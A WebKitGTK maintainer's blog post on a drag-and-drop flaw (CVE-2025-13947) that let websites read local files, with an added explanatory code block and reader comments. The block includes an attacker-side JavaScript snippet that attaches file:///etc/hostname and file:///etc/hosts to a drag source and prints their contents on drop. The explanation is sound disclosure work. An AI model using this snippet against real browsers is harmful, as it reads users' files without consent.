Significant Drag and Drop Vulnerability in WebKitGTK


WebKitGTK 2.50.3 contains a workaround for CVE-2025-13947, an issue that allows websites to exfiltrate files from your filesystem. If you’re using Epiphany or any other web browser based on WebKitGTK, then you should immediately update to 2.50.3.

Websites may attach file URLs to drag sources. When the drag source is dropped onto a drop target, the website can read the file data for its chosen files, without any restrictions. Oops. Suffice to say, this is not how drag and drop is supposed to work. Websites should not be able to choose for themselves which files to read from your filesystem; only the user is supposed to be able to make that choice, by dragging the file from an external application. That is, drag sources created by websites should not receive file access.

I failed to find the correct way to fix this bug in the two afternoons I allowed myself to work on this issue, so instead my overly-broad solution was to disable file access for all drags. With this workaround, the website will only receive the list of file URLs rather than the file contents.
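
The two paragraphs above describe the broken behaviour and the shipped workaround in prose. As an added illustration (not WebKitGTK code, not the author's patch), the block below shows the attacker-side half in plain HTML drag-and-drop API calls, and a small model of the decision the embedder has to make when a drop arrives: the pre-fix behaviour (page-chosen file: URLs yield readable file data), the 2.50.3 workaround as described (no drag gets file access, only the URL list), and the intended rule the post states (only drags from an external application should carry file access). The function names, the `dragOrigin` labels and the assumption that the payload is an RFC 2483 `text/uri-list` are mine; the idea that dropped file: URLs surface to the page as readable `File` objects is likewise an assumption about the mechanism, since the post only says the data becomes readable.

```javascript
// Added illustration, not WebKitGTK source. Models the policy question the post
// raises; names and the text/uri-list assumption are the example's own.

// Parse an RFC 2483 text/uri-list payload: one URI per line, CRLF or LF line
// endings, lines starting with '#' are comments, blank lines are ignored.
function parseUriList(payload) {
  return payload
    .split(/\r?\n/)
    .map((line) => line.trim())
    .filter((line) => line.length > 0 && !line.startsWith('#'));
}

// Which entries would grant filesystem access if the embedder honoured them
// as files? Anything that is not a parseable URL is ignored.
function fileUrls(uris) {
  return uris.filter((u) => {
    try { return new URL(u).protocol === 'file:'; } catch { return false; }
  });
}

// WebKitGTK behaviour as described in the post, before and after 2.50.3.
// Before: file data is readable for every file: URL, whoever created the drag.
// After (workaround): no drag receives file access; the page sees URLs only.
function resolveDrop(uris, workaroundEnabled) {
  const files = fileUrls(uris);
  if (!workaroundEnabled) return { urls: uris, fileAccess: files };
  return { urls: uris, fileAccess: [] };
}

// The rule the post says drag and drop is supposed to follow: file access only
// when the user dragged the item in from another application ('external'),
// never when web content created the drag source itself ('page').
function intendedPolicy(uris, dragOrigin) {
  const files = fileUrls(uris);
  return { urls: uris, fileAccess: dragOrigin === 'external' ? files : [] };
}

// Attacker side: a page attaching file: URLs of its own choosing to a drag
// source, then reading whatever the drop target is handed. Standard HTML
// DataTransfer API; only wired up when a DOM exists, so it is skipped in Node.
if (typeof document !== 'undefined') {
  const src = document.createElement('div');
  src.draggable = true;
  src.textContent = 'drag me';
  src.addEventListener('dragstart', (e) => {
    // Constructed payload: the page, not the user, picks these paths.
    e.dataTransfer.setData('text/uri-list', 'file:///etc/hostname\r\nfile:///etc/hosts');
  });
  const target = document.createElement('div');
  target.textContent = 'drop here';
  target.addEventListener('dragover', (e) => e.preventDefault());
  target.addEventListener('drop', async (e) => {
    e.preventDefault();
    // Assumed mechanism: in a vulnerable embedder the page-chosen file: URLs
    // arrive as readable File objects; with the workaround only the URL list does.
    for (const f of e.dataTransfer.files) console.log(f.name, await f.text());
    console.log(parseUriList(e.dataTransfer.getData('text/uri-list')));
  });
  document.body.append(src, target);
}
```

The point the model makes explicit is that the data format alone cannot tell the embedder who chose the files: an identical `text/uri-list` arrives whether a user dragged two files in from a file manager or the page wrote them in `dragstart`. The trust decision has to come from the drag's provenance, which is why the post's "intended" rule keys on where the drag originated, and why a fix that does not yet have that signal falls back to denying file access for every drag.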

Apple platforms are not affected by this issue.

Comments

4 responses to “Significant Drag and Drop Vulnerability in WebKitGTK”

  1. Jena

    Hi, does this only affect drag-n-drop? I usually use select dialogs.

    Geary is affected too I assume, does the Flatpak get the fix too? Manjaro I can check later myself, but probably yes.

    1. Jena

      Haha, the update just arrived in Debian Trixie (LMDE7). I realized I mostly don’t use Geary as flatpak because it has theming issues (e.g. no dark mode).

    2. Michael Catanzaro

      This only affects drag and drop. The GNOME 48 and 49 Flatpak runtimes are already fixed. I doubt it’s a problem for Geary at all, because emails cannot execute JavaScript.

  2. SeeM

    Thanks. Disabling it is perfectly fine.

    I never got into drag/drop and always use some dialog, just to avoid misclicks. It was just more important than it should have been.